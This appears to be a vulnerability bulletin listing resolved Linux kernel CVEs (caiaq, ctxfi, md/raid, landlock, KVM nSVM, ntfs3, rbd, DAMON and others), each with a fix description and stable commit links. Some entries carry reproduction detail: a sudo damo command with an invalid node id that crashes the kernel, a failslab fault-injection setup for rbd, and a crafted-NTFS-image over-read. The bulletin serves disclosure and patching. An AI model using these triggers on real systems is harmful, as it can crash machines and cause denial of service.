| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: caiaq: fix usb_dev refcount leak on probe failure create_card() takes a reference on the USB device with usb_get_dev() and stores the matching usb_put_dev() in card_free(), which is installed as the snd_card's ->private_free destructor. However, ->private_free is only assigned near the end of init_card(), after several failure points (usb_set_interface(), EP type checks, usb_submit_urb(), the EP1_CMD_GET_DEVICE_INFO exchange, and its timeout). When any of those fail, init_card() returns an error to snd_probe(), which calls snd_card_free(card). Because ->private_free is still NULL, card_free() never runs, the usb_get_dev() reference is not dropped, and the struct usb_device leaks along with its descriptor allocations and device_private. syzbot reproduces this with a malformed UAC3 device whose only valid altsetting is 0; init_card()'s usb_set_interface(usb_dev, 0, 1) call fails with -EIO and triggers the leak. Move the ->private_free assignment into create_card(), immediately after usb_get_dev(), so that every error path reaching snd_card_free() balances the reference. card_free()'s callees (snd_usb_caiaq_input_free, free_urbs, kfree) already tolerate the partially-initialized state because the chip private area is zero-initialized by snd_card_new(). | 2026-05-27 | not yet calculated | CVE-2026-46048 | https://git.kernel.org/stable/c/50c6a1f05973f56d23280c9d7645a7a5734e0907 https://git.kernel.org/stable/c/da3b8fd6a202d94fef11a443abc9171c52426a1c https://git.kernel.org/stable/c/6153878c5255bb69b7d0868105ca078ef13cbcf8 https://git.kernel.org/stable/c/21ca595aafa40d3ac70eab1f4cb62cc00ca21657 https://git.kernel.org/stable/c/7a5f1cd22d47f8ca4b760b6334378ae42c1bd24b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: ctxfi: Add fallback to default RSR for S/PDIF spdif_passthru_playback_get_resources() uses atc->pll_rate as the RSR for the MSR calculation loop. However, pll_rate is only updated in atc_pll_init() and not in hw_pll_init(), so it remains 0 after the card init. When spdif_passthru_playback_setup() skips atc_pll_init() for 32000 Hz, (rsr * desc.msr) always becomes 0, causing the loop to spin indefinitely. Add fallback to use atc->rsr when atc->pll_rate is 0. This reflects the hardware state, since hw_card_init() already configures the PLL to the default RSR. | 2026-05-27 | not yet calculated | CVE-2026-46049 | https://git.kernel.org/stable/c/25ded535ee261161bcf19dafd525c542e606559d https://git.kernel.org/stable/c/30f9494c6f2b53a78822cfb653ffbb1d092d44c8 https://git.kernel.org/stable/c/09496158f6ebba8830593f8972035c02f97124c1 https://git.kernel.org/stable/c/95b1ee8442cabbde83b2848e7c6100df90f3a00d https://git.kernel.org/stable/c/7d61662197ecdc458e33e475b6ada7f6da61d364 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix deadlock with check operation and nowait requests When an array check is running it will raise the barrier at which point normal requests will become blocked and increment the nr_pending value to signal there is work pending inside of wait_barrier(). NOWAIT requests do not block and so will return immediately with an error, and additionally do not increment nr_pending in wait_barrier(). Upstream change commit 43806c3d5b9b ("raid10: cleanup memleak at raid10_make_request") added a call to raid_end_bio_io() to fix a memory leak when NOWAIT requests hit this condition. raid_end_bio_io() eventually calls allow_barrier() and it will unconditionally do an atomic_dec_and_test(&conf->nr_pending) even though the corresponding increment on nr_pending didn't happen in the NOWAIT case. This can be easily seen by starting a check operation while an application is doing nowait IO on the same array. This results in a deadlocked state due to the nr_pending value underflowing and so the md resync thread gets stuck waiting for nr_pending to == 0. Output of r10conf state of the array when we hit this condition: crash> struct r10conf barrier = 1, nr_pending = { counter = -41 }, nr_waiting = 15, nr_queued = 0, Example of md_sync thread stuck waiting on raise_barrier() and other requests stuck in wait_barrier(): md1_resync [<0>] raise_barrier+0xce/0x1c0 [<0>] raid10_sync_request+0x1ca/0x1ed0 [<0>] md_do_sync+0x779/0x1110 [<0>] md_thread+0x90/0x160 [<0>] kthread+0xbe/0xf0 [<0>] ret_from_fork+0x34/0x50 [<0>] ret_from_fork_asm+0x1a/0x30 kworker/u1040:2+flush-253:4 [<0>] wait_barrier+0x1de/0x220 [<0>] regular_request_wait+0x30/0x180 [<0>] raid10_make_request+0x261/0x1000 [<0>] md_handle_request+0x13b/0x230 [<0>] __submit_bio+0x107/0x1f0 [<0>] submit_bio_noacct_nocheck+0x16f/0x390 [<0>] ext4_io_submit+0x24/0x40 [<0>] ext4_do_writepages+0x254/0xc80 [<0>] ext4_writepages+0x84/0x120 [<0>] do_writepages+0x7a/0x260 [<0>] __writeback_single_inode+0x3d/0x300 [<0>] writeback_sb_inodes+0x1dd/0x470 [<0>] __writeback_inodes_wb+0x4c/0xe0 [<0>] wb_writeback+0x18b/0x2d0 [<0>] wb_workfn+0x2a1/0x400 [<0>] process_one_work+0x149/0x330 [<0>] worker_thread+0x2d2/0x410 [<0>] kthread+0xbe/0xf0 [<0>] ret_from_fork+0x34/0x50 [<0>] ret_from_fork_asm+0x1a/0x30 | 2026-05-27 | not yet calculated | CVE-2026-46050 | https://git.kernel.org/stable/c/965d6162dd88cc7cc193cf7f5bfc132d8bbf0523 https://git.kernel.org/stable/c/42fe37c90184cd1568838b84b488934c3671c963 https://git.kernel.org/stable/c/cac2106bb9a2180b288079b49ed626414fb5bc45 https://git.kernel.org/stable/c/1cdff2937c618f81058422bbdc4974a3e7ec9379 https://git.kernel.org/stable/c/7d96f3120a7fb7210d21b520c5b6f495da6ba436 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: fix soft lockup in retry_aligned_read() When retry_aligned_read() encounters an overlapped stripe, it releases the stripe via raid5_release_stripe() which puts it on the lockless released_stripes llist. In the next raid5d loop iteration, release_stripe_list() drains the stripe onto handle_list (since STRIPE_HANDLE is set by the original IO), but retry_aligned_read() runs before handle_active_stripes() and removes the stripe from handle_list via find_get_stripe() -> list_del_init(). This prevents handle_stripe() from ever processing the stripe to resolve the overlap, causing an infinite loop and soft lockup. Fix this by using __release_stripe() with temp_inactive_list instead of raid5_release_stripe() in the failure path, so the stripe does not go through the released_stripes llist. This allows raid5d to break out of its loop, and the overlap will be resolved when the stripe is eventually processed by handle_stripe(). | 2026-05-27 | not yet calculated | CVE-2026-46051 | https://git.kernel.org/stable/c/09880592f5a9dc73377d6eb5ac123537b5f8df49 https://git.kernel.org/stable/c/80fc6ca2cbde018d52e13f305edcd643911bd94b https://git.kernel.org/stable/c/1985cb3247e87ff6b8ca4bc5f9626f4f51024507 https://git.kernel.org/stable/c/883cc33b7af1c448663287f069ef9dfea001e90f https://git.kernel.org/stable/c/7f9f7c697474268d9ef9479df3ddfe7cdcfbbffc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: landlock: Fix LOG_SUBDOMAINS_OFF inheritance across fork() hook_cred_transfer() only copies the Landlock security blob when the source credential has a domain. This is inconsistent with landlock_restrict_self() which can set LOG_SUBDOMAINS_OFF on a credential without creating a domain (via the ruleset_fd=-1 path): the field is committed but not preserved across fork() because the child's prepare_creds() calls hook_cred_transfer() which skips the copy when domain is NULL. This breaks the documented use case where a process mutes subdomain logs before forking sandboxed children: the children lose the muting and their domains produce unexpected audit records. Fix this by unconditionally copying the Landlock credential blob. | 2026-05-27 | not yet calculated | CVE-2026-46057 | https://git.kernel.org/stable/c/2fcde49092aac55d5beef43fdd3633217672f7d1 https://git.kernel.org/stable/c/1c513b8a00df13d231021e74ad92babb3fedf64a https://git.kernel.org/stable/c/874c8f83826c95c62c21d9edfe9ef43e5c346724 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Always use NextRIP as vmcb02's NextRIP after first L2 VMRUN For guests with NRIPS disabled, L1 does not provide NextRIP when running an L2 with an injected soft interrupt, instead it advances the current RIP before running it. KVM uses the current RIP as the NextRIP in vmcb02 to emulate a CPU without NRIPS. However, after L2 runs the first time, NextRIP will be updated by the CPU and/or KVM, and the current RIP is no longer the correct value to use in vmcb02. Hence, after save/restore, use the current RIP if and only if a nested run is pending, otherwise use NextRIP. Give soft_int_next_rip the same treatment, as it's the same logic, just for a narrower use case. [sean: give soft_int_next_rip the same treatment] | 2026-05-27 | not yet calculated | CVE-2026-46059 | https://git.kernel.org/stable/c/3428ed1529a1af4cce5aff6c5bd2fcc39ad726bb https://git.kernel.org/stable/c/69fe1411a5ce678b4da6489b5d2282b4e1d13acf https://git.kernel.org/stable/c/8d397582f6b5e9fbcf09781c7c934b4910e94a50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: qat - fix IRQ cleanup on 6xxx probe failure When adf_dev_up() partially completes and then fails, the IRQ handlers registered during adf_isr_resource_alloc() are not detached before the MSI-X vectors are released. Since the device is enabled with pcim_enable_device(), calling pci_alloc_irq_vectors() internally registers pcim_msi_release() as a devres action. On probe failure, devres runs pcim_msi_release() which calls pci_free_irq_vectors(), tearing down the MSI-X vectors while IRQ handlers (for example 'qat0-bundle0') are still attached. This causes remove_proc_entry() warnings: [ 22.163964] remove_proc_entry: removing non-empty directory 'irq/143', leaking at least 'qat0-bundle0' Moving the devm_add_action_or_reset() before adf_dev_up() does not solve the problem since devres runs in LIFO order and pcim_msi_release(), registered later inside adf_dev_up(), would still fire before adf_device_down(). Fix by calling adf_dev_down() explicitly when adf_dev_up() fails, to properly free IRQ handlers before devres releases the MSI-X vectors. | 2026-05-27 | not yet calculated | CVE-2026-46060 | https://git.kernel.org/stable/c/27f561bf894e46bdc2d6209c50884adad79d8277 https://git.kernel.org/stable/c/7cd651f1357dcc477e6483c3a4706836b46bdc92 https://git.kernel.org/stable/c/95aed2af87ec43fa7624cc81dd13d37824ad4972 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: fix deadlock in jbd2_journal_cancel_revoke() Commit f76d4c28a46a ("fs/jbd2: use sleeping version of __find_get_block()") changed jbd2_journal_cancel_revoke() to use __find_get_block_nonatomic() which holds the folio lock instead of i_private_lock. This breaks the lock ordering (folio -> buffer) and causes an ABBA deadlock when the filesystem blocksize < pagesize: T1 T2 ext4_mkdir() ext4_init_new_dir() ext4_append() ext4_getblk() lock_buffer() <- A sync_blockdev() blkdev_writepages() writeback_iter() writeback_get_folio() folio_lock() <- B ext4_journal_get_create_access() jbd2_journal_cancel_revoke() __find_get_block_nonatomic() folio_lock() <- B block_write_full_folio() lock_buffer() <- A This can occasionally cause generic/013 to hang. Fix by only calling __find_get_block_nonatomic() when the passed buffer_head doesn't belong to the bdev, which is the only case that we need to look up its bdev alias. Otherwise, the lookup is redundant since the found buffer_head is equal to the one we passed in. | 2026-05-27 | not yet calculated | CVE-2026-46061 | https://git.kernel.org/stable/c/dff07cc98fdf6af57a7c054dc09b2050a9d5c287 https://git.kernel.org/stable/c/2b2fee890250ab647a601124471a334bb01a0790 https://git.kernel.org/stable/c/bbd943d6a2d566428324b516a37f98328dfb802d https://git.kernel.org/stable/c/981fcc5674e67158d24d23e841523eccba19d0e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/shstk: Prevent deadlock during shstk sigreturn During sigreturn the shadow stack signal frame is popped. The kernel does this by reading the shadow stack using normal read accesses. When it can't assume the memory is shadow stack, it takes extra steps to make sure it is reading actual shadow stack memory and not other normal readable memory. It does this by holding the mmap read lock while doing the access and checking the flags of the VMA. Unfortunately that is not safe. If the read of the shadow stack sigframe hits a page fault, the fault handler will try to recursively grab another mmap read lock. This normally works ok, but if a writer on another CPU is also waiting, the second read lock could fail and cause a deadlock. Fix this by not holding mmap lock during the read access to userspace. Instead use mmap_lock_speculate_...() to watch for changes between dropping mmap lock and the userspace access. Retry if anything grabbed an mmap write lock in between and could have changed the VMA. These mmap_lock_speculate_...() helpers use mm::mm_lock_seq, which is only available when PER_VMA_LOCK is configured. So make X86_USER_SHADOW_STACK depend on it. On x86, PER_VMA_LOCK is a default configuration for SMP kernels. So drop support for the other configs under the assumption that the !SMP shadow stack user base does not exist. Currently there is a check that skips the lookup work when the SSP can be assumed to be on a shadow stack. While reorganizing the function, remove the optimization to make the tricky code flows more common, such that issues like this cannot escape detection for so long. | 2026-05-27 | not yet calculated | CVE-2026-46063 | https://git.kernel.org/stable/c/e2c2b044458cbf22da05264fa707308e8d4f86f9 https://git.kernel.org/stable/c/d042d69b417515959e49021fef008c9b04a99bd5 https://git.kernel.org/stable/c/4f3374c990fb2adec06d20fd6d780927811c9aa0 https://git.kernel.org/stable/c/3d29db827502067626062f5c74dd502d14ab15bc https://git.kernel.org/stable/c/9874b2917b9fbc30956fee209d3c4aa47201c64e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ibmasm: fix heap over-read in ibmasm_send_i2o_message() The ibmasm_send_i2o_message() function uses get_dot_command_size() to compute the byte count for memcpy_toio(), but this value is derived from user-controlled fields in the dot_command_header (command_size: u8, data_size: u16) and is never validated against the actual allocation size. A root user can write a small buffer with inflated header fields, causing memcpy_toio() to read up to ~65 KB past the end of the allocation into adjacent kernel heap, which is then forwarded to the service processor over MMIO. Silently clamping the copy size is not sufficient: if the header fields claim a larger size than the buffer, the SP receives a dot command whose own header is inconsistent with the I2O message length, which can cause the SP to desynchronize. Reject such commands outright by returning failure. Validate command_size before calling get_mfa_inbound() to avoid leaking an I2O message frame: reading INBOUND_QUEUE_PORT dequeues a hardware frame from the controller's free pool, and returning without a corresponding set_mfa_inbound() call would permanently exhaust it. Additionally, clamp command_size to I2O_COMMAND_SIZE before the memcpy_toio() so the MMIO write stays within the I2O message frame, consistent with the clamping already performed by outgoing_message_size() for the header field. | 2026-05-27 | not yet calculated | CVE-2026-46064 | https://git.kernel.org/stable/c/fd19eb1c75047a4ed4e855f56cafd704dc3914e0 https://git.kernel.org/stable/c/fe31722b0194ff76bf8b461e8bf97a2081147787 https://git.kernel.org/stable/c/c1c2417c60dbdca5ebb00462f21ee71c2d7f7083 https://git.kernel.org/stable/c/9e8f6c9d4ecddda2f28baa1678340286cff3969c https://git.kernel.org/stable/c/9aad71144fa3682cca3837a06c8623016790e7ec |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ceph: fix num_ops off-by-one when crypto allocation fails move_dirty_folio_in_page_array() may fail if the file is encrypted, the dirty folio is not the first in the batch, and it fails to allocate a bounce buffer to hold the ciphertext. When that happens, ceph_process_folio_batch() simply redirties the folio and flushes the current batch -- it can retry that folio in a future batch. However, if this failed folio is not contiguous with the last folio that did make it into the batch, then ceph_process_folio_batch() has already incremented `ceph_wbc->num_ops`; because it doesn't follow through and add the discontiguous folio to the array, ceph_submit_write() -- which expects that `ceph_wbc->num_ops` accurately reflects the number of contiguous ranges (and therefore the required number of "write extent" ops) in the writeback -- will panic the kernel: BUG_ON(ceph_wbc->op_idx + 1 != req->r_num_ops); This issue can be reproduced on affected kernels by writing to fscrypt-enabled CephFS file(s) with a 4KiB-written/4KiB-skipped/repeat pattern (total filesize should not matter) and gradually increasing the system's memory pressure until a bounce buffer allocation fails. Fix this crash by decrementing `ceph_wbc->num_ops` back to the correct value when move_dirty_folio_in_page_array() fails, but the folio already started counting a new (i.e. still-empty) extent. The defect corrected by this patch has existed since 2022 (see first `Fixes:`), but another bug blocked multi-folio encrypted writeback until recently (see second `Fixes:`). The second commit made it into 6.18.16, 6.19.6, and 7.0-rc1, unmasking the panic in those versions. This patch therefore fixes a regression (panic) introduced by cac190c7674f. | 2026-05-27 | not yet calculated | CVE-2026-46066 | https://git.kernel.org/stable/c/6200f41d6fcf2ac7e24866431e381cbc914560e4 https://git.kernel.org/stable/c/ba12c1e578890f6337a415b7dedf476c6d455105 https://git.kernel.org/stable/c/a0d9555bf9eaeba34fe6b6bb86f442fe08ba3842 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: validate damos_quota_goal->nid for node_memcg_{used,free}_bp Users can set damos_quota_goal->nid with an arbitrary value for node_memcg_{used,free}_bp. But DAMON core is using those for NODE_DATA() without a validation of the value. This can result in out of bounds memory access. The issue can actually be triggered using the DAMON user-space tool (damo), like below. $ sudo mkdir /sys/fs/cgroup/foo $ sudo ./damo start --damos_action stat --damos_quota_interval 1s \ --damos_quota_goal node_memcg_used_bp 50% -1 /foo $ sudo dmesg [...] [ 524.181426] Unable to handle kernel paging request at virtual address 0000000000002c00 Fix this issue by adding the validation of the given node id. If an invalid node id is given, it returns 0% for used memory ratio, and 100% for free memory ratio. | 2026-05-27 | not yet calculated | CVE-2026-46067 | https://git.kernel.org/stable/c/da10db73ada26345244ea5dc52f974692bd05f66 https://git.kernel.org/stable/c/a34dac6482e53e2c76944f25b1489b9b7da3a6e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: nx - fix bounce buffer leaks in nx842_crypto_{alloc,free}_ctx The bounce buffers are allocated with __get_free_pages() using BOUNCE_BUFFER_ORDER (order 2 = 4 pages), but both the allocation error path and nx842_crypto_free_ctx() release the buffers with free_page(). Use free_pages() with the matching order instead. | 2026-05-27 | not yet calculated | CVE-2026-46068 | https://git.kernel.org/stable/c/f17a4850d1ce7c11cba8b1830b9bfedfede878bb https://git.kernel.org/stable/c/910bb34b801d39794e656f7d48414844b2bd354e https://git.kernel.org/stable/c/5c07962fed66e1238fad7635fa150570bd38b4c5 https://git.kernel.org/stable/c/80fd99d7c30ea889662d21f1b44d8fea4c83138d https://git.kernel.org/stable/c/adb3faf2db1a66d0f015b44ac909a32dfc7f2f9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mwifiex: fix use-after-free in mwifiex_adapter_cleanup() The mwifiex_adapter_cleanup() function uses timer_delete() (non-synchronous) for the wakeup_timer before the adapter structure is freed. This is incorrect because timer_delete() does not wait for any running timer callback to complete. If the wakeup_timer callback (wakeup_timer_fn) is executing when mwifiex_adapter_cleanup() is called, the callback will continue to access adapter fields (adapter->hw_status, adapter->if_ops.card_reset, etc.) which may be freed by mwifiex_free_adapter() called later in the mwifiex_remove_card() path. Use timer_delete_sync() instead to ensure any running timer callback has completed before returning. | 2026-05-27 | not yet calculated | CVE-2026-46069 | https://git.kernel.org/stable/c/11869ce402d95519d49b25a2a97741f68d69d103 https://git.kernel.org/stable/c/63fe3389b3e092d6c0eeea9fc0318e7918b16618 https://git.kernel.org/stable/c/4e179a60a60c0a5aea245e8e67768343c0f070b8 https://git.kernel.org/stable/c/030abbae49cf9fd1fba7aa08e15ec81efbeb78cf https://git.kernel.org/stable/c/ae5e95d4157481693be2317e3ffcd84e36010cbb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Avoid clearing VMCB_LBR in vmcb12 svm_copy_lbrs() always marks VMCB_LBR dirty in the destination VMCB. However, nested_svm_vmexit() uses it to copy LBRs to vmcb12, and clearing clean bits in vmcb12 is not architecturally defined. Move vmcb_mark_dirty() to callers and drop it for vmcb12. This also facilitates incoming refactoring that does not pass the entire VMCB to svm_copy_lbrs(). | 2026-05-27 | not yet calculated | CVE-2026-46071 | https://git.kernel.org/stable/c/a3f0981a5a0e0bd51ad74cc7d9eed32294b24002 https://git.kernel.org/stable/c/9efe23568806d1cd06f7d146f9b3037b8d585a9f https://git.kernel.org/stable/c/b53ab5167a81537777ac780bbd93d32613aa3bda |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: add buffer boundary checks to run_unpack() run_unpack() checks `run_buf < run_last` at the top of the while loop but then reads size_size and offset_size bytes via run_unpack_s64() without verifying they fit within the remaining buffer. A crafted NTFS image with truncated run data in an MFT attribute triggers an OOB heap read of up to 15 bytes when the filesystem is mounted. Add boundary checks before each run_unpack_s64() call to ensure the declared field size does not exceed the remaining buffer. Found by fuzzing with a source-patched harness (LibAFL + QEMU). | 2026-05-27 | not yet calculated | CVE-2026-46072 | https://git.kernel.org/stable/c/bf7ac4a1d3bfc6e56e54635c3d331a68170d37c9 https://git.kernel.org/stable/c/e64f7dfcaff79e7dfff9121a382dd77f9b462f62 https://git.kernel.org/stable/c/d3012690a7065d9ca86521a525ad11e8af491d45 https://git.kernel.org/stable/c/41aadf5cb482793a24e05aa136224e179a778586 https://git.kernel.org/stable/c/b62567bca47408e6739dee75f02a2113548af875 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (powerz) Fix missing usb_kill_urb() on signal interrupt wait_for_completion_interruptible_timeout() returns -ERESTARTSYS when interrupted. This needs to abort the URB and return an error. No data has been received from the device so any reads from the transfer buffer are invalid. The original code tests !ret, which only catches the timeout case (0). On signal delivery (-ERESTARTSYS), !ret is false so the function skips usb_kill_urb() and falls through to read from the unfilled transfer buffer. Fix by capturing the return value into a long (matching the function return type) and handling signal (negative) and timeout (zero) cases with separate checks that both call usb_kill_urb() before returning. | 2026-05-27 | not yet calculated | CVE-2026-46073 | https://git.kernel.org/stable/c/8b51277eec433d4e724b273a5a5c64e8acfbe405 https://git.kernel.org/stable/c/b6cb07f02253bdefd2339e57eaa1428a7b28cd0f https://git.kernel.org/stable/c/d64458784036f5818e22781254b6be299d52a19c https://git.kernel.org/stable/c/b66437cb20a2d9ef201f40b675569f8ea7787c9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: ch341: fix memory leaks on probe failures Make sure to deregister the controller, disable pins, and kill and free the RX URB on probe failures to mirror disconnect and avoid memory leaks and use-after-free. Also add an explicit URB kill on disconnect for symmetry (even if that is not strictly required as USB core would have stopped it in the current setup). | 2026-05-27 | not yet calculated | CVE-2026-46074 | https://git.kernel.org/stable/c/5c6518633702d7f7b1153e9d8e042af847f11ef3 https://git.kernel.org/stable/c/ff8a7996dc8bf433efe2126ffdaee5b374a89e30 https://git.kernel.org/stable/c/9bee2faf9e21c796d0d222c9d84a98f41bd303a0 https://git.kernel.org/stable/c/b99e3ddb91b499d920e63a2daff8880be68cfe9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: atmel-sha204a - Fix potential UAF and memory leak in remove path Unregister the hwrng to prevent new ->read() calls and flush the Atmel I2C workqueue before teardown to prevent a potential UAF if a queued callback runs while the device is being removed. Drop the early return to ensure sysfs entries are removed and ->hwrng.priv is freed, preventing a memory leak. | 2026-05-27 | not yet calculated | CVE-2026-46075 | https://git.kernel.org/stable/c/c5a45d14234bf26e28a89e3a5dcc08336595cf11 https://git.kernel.org/stable/c/775c00d87c385b758da9504cf053acea00e2ed40 https://git.kernel.org/stable/c/1193c12126d39bf986a5a9214827b73707b193ab https://git.kernel.org/stable/c/31901371ccd16b42d2f167b1018ba9ae8bd5a6c7 https://git.kernel.org/stable/c/bab1adf3b87e4bfac92c4f5963c63db434d561c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: atmel-tdes - fix DMA sync direction Before DMA output is consumed by the CPU, ->dma_addr_out must be synced with dma_sync_single_for_cpu() instead of dma_sync_single_for_device(). Using the wrong direction can return stale cache data on non-coherent platforms. | 2026-05-27 | not yet calculated | CVE-2026-46077 | https://git.kernel.org/stable/c/5281e6e2302362f6b75b70cbfe4098d2a25dafd9 https://git.kernel.org/stable/c/12a0adfe498cd5d87e6365d7ca5f6b3eed79e523 https://git.kernel.org/stable/c/863d11b3927703ad95077c81a8a6489c5c7872f7 https://git.kernel.org/stable/c/b5f5df801d161ba244f391519cbff2f4e5c6edc2 https://git.kernel.org/stable/c/c8a9a647532f5c2a04180352693215e24e9dba03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rbd: fix null-ptr-deref when device_add_disk() fails do_rbd_add() publishes the device with device_add() before calling device_add_disk(). If device_add_disk() fails after device_add() succeeds, the error path calls rbd_free_disk() directly and then later falls through to rbd_dev_device_release(), which calls rbd_free_disk() again. This double teardown can leave blk-mq cleanup operating on invalid state and trigger a null-ptr-deref in __blk_mq_free_map_and_rqs(), reached from blk_mq_free_tag_set(). Fix this by following the normal remove ordering: call device_del() before rbd_dev_device_release() when device_add_disk() fails after device_add(). That keeps the teardown sequence consistent and avoids re-entering disk cleanup through the wrong path. The bug was first flagged by an experimental analysis tool we are developing for kernel memory-management bugs while analyzing v6.13-rc1. The tool is still under development and is not yet publicly available. We reproduced the bug on v7.0 with a real Ceph backend and a QEMU x86_64 guest booted with KASAN and CONFIG_FAILSLAB enabled. The reproducer confines failslab injections to the __add_disk() range and injects fail-nth while mapping an RBD image through /sys/bus/rbd/add_single_major. On the unpatched kernel, fail-nth=4 reliably triggered the fault: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 UID: 0 PID: 273 Comm: bash Not tainted 7.0.0-01247-gd60bc1401583 #6 PREEMPT(lazy) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 RIP: 0010:__blk_mq_free_map_and_rqs+0x8c/0x240 Code: 00 00 48 8b 6b 60 41 89 f4 49 c1 e4 03 4c 01 e5 45 85 ed 0f 85 0a 01 00 00 48 b8 00 00 00 00 00 fc ff df 48 89 e9 48 c1 e9 03 <80> 3c 01 00 0f 85 31 01 00 00 4c 8b 6d 00 4d 85 ed 0f 84 e2 00 00 RSP: 0018:ff1100000ab0fac8 EFLAGS: 00000246 RAX: dffffc0000000000 RBX: ff1100000c4806a0 RCX: 0000000000000000 RDX: 0000000000000002 RSI: 0000000000000000 RDI: ff1100000c4806f4 RBP: 0000000000000000 R08: 0000000000000001 R09: ffe21c000189001b R10: ff1100000c4800df R11: ff1100006cf37be0 R12: 0000000000000000 R13: 0000000000000000 R14: ff1100000c480700 R15: ff1100000c480004 FS: 00007f0fbe8fe740(0000) GS:ff110000e5851000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fe53473b2e0 CR3: 0000000012eef000 CR4: 00000000007516f0 PKRU: 55555554 Call Trace: <TASK> blk_mq_free_tag_set+0x77/0x460 do_rbd_add+0x1446/0x2b80 ? __pfx_do_rbd_add+0x10/0x10 ? lock_acquire+0x18c/0x300 ? find_held_lock+0x2b/0x80 ? sysfs_file_kobj+0xb6/0x1b0 ? __pfx_sysfs_kf_write+0x10/0x10 kernfs_fop_write_iter+0x2f4/0x4a0 vfs_write+0x98e/0x1000 ? expand_files+0x51f/0x850 ? __pfx_vfs_write+0x10/0x10 ksys_write+0xf2/0x1d0 ? __pfx_ksys_write+0x10/0x10 do_syscall_64+0x115/0x690 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f0fbea15907 Code: 10 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b7 0f 1f 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 51 c3 48 83 ec 28 48 89 54 24 18 48 89 74 24 RSP: 002b:00007ffe22346ea8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 0000000000000058 RCX: 00007f0fbea15907 RDX: 0000000000000058 RSI: 0000563ace6c0ef0 RDI: 0000000000000001 RBP: 0000563ace6c0ef0 R08: 0000563ace6c0ef0 R09: 6b6435726d694141 R10: 5250337279762f78 R11: 0000000000000246 R12: 0000000000000058 R13: 00007f0fbeb1c780 R14: ff1100000c480700 R15: ff1100000c480004 </TASK> With this fix applied, rerunning the reproducer over fail-nth=1..256 yields no KASAN reports. [ idryomov: rename err_out_device_del -> err_out_device ] | 2026-05-27 | not yet calculated | CVE-2026-46079 | https://git.kernel.org/stable/c/2f4809a879f0750c7790bbeeae86c9505797a06f https://git.kernel.org/stable/c/564cd8f4aeb9a938e470c5c91922fd02e4d41acc https://git.kernel.org/stable/c/ad0126ffcba8777109852979eaaa6dca6703abdb https://git.kernel.org/stable/c/059fb7656723c1b77c2fc0e64b7aa99d6bb65e8e https://git.kernel.org/stable/c/d1fef92e414433ca7b89abf85cb0df42b8d475eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: split transactions in dio completion to avoid credit exhaustion During ocfs2 dio operations, JBD2 may report warnings via the following call trace: ocfs2_dio_end_io_write ocfs2_mark_extent_written ocfs2_change_extent_flag ocfs2_split_extent ocfs2_try_to_merge_extent ocfs2_extend_rotate_transaction ocfs2_extend_trans jbd2__journal_restart start_this_handle output: JBD2: kworker/6:2 wants too many credits credits:5450 rsv_credits:0 max:5449 To prevent exceeding the credits limit, modify ocfs2_dio_end_io_write() to handle extents in batches of transactions. Additionally, relocate ocfs2_del_inode_from_orphan(). The orphan inode should only be removed from the orphan list after the extent tree update is complete. This ensures that if a crash occurs in the middle of extent tree updates, we won't leave stale blocks beyond EOF. This patch also changes the logic for updating the inode size and removing the orphan, making it similar to ext4_dio_write_end_io(). Both operations are performed only when everything looks good. Finally, thanks to Jans and Joseph for providing the bug fix prototype and suggestions. | 2026-05-27 | not yet calculated | CVE-2026-46080 | https://git.kernel.org/stable/c/886f97fa59d0bbfa9859fb1a66dd9e014b522d89 https://git.kernel.org/stable/c/ea5bb1d20da756e4f41a48dad42b2e7d6e73f71e https://git.kernel.org/stable/c/3c636a3edca9c3f180b3079f94fe7e115730d9c6 https://git.kernel.org/stable/c/069c3fb310e9336cf48cfdf8748a32c29fd0193d https://git.kernel.org/stable/c/d647c5b2fbf81560818dacade360abc8c00a9665 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Inject #UD for INVLPGA if EFER.SVME=0 INVLPGA should cause a #UD when EFER.SVME is not set. Add a check to properly inject #UD when EFER.SVME=0. [sean: tag for stable@] | 2026-05-27 | not yet calculated | CVE-2026-46082 | https://git.kernel.org/stable/c/3ac9d4241d205f5d0df06358349ca718ebb0fa12 https://git.kernel.org/stable/c/643125b66ffc1147c66616b749475ba9efb15971 https://git.kernel.org/stable/c/c15392ed9e49c1a16b4d3a3ccf1b3bf2318a6c28 https://git.kernel.org/stable/c/ee24928ecd85db4b68ed111e91fef36af0ca37b0 https://git.kernel.org/stable/c/d99df02ff427f461102230f9c5b90a6c64ee8e23 |
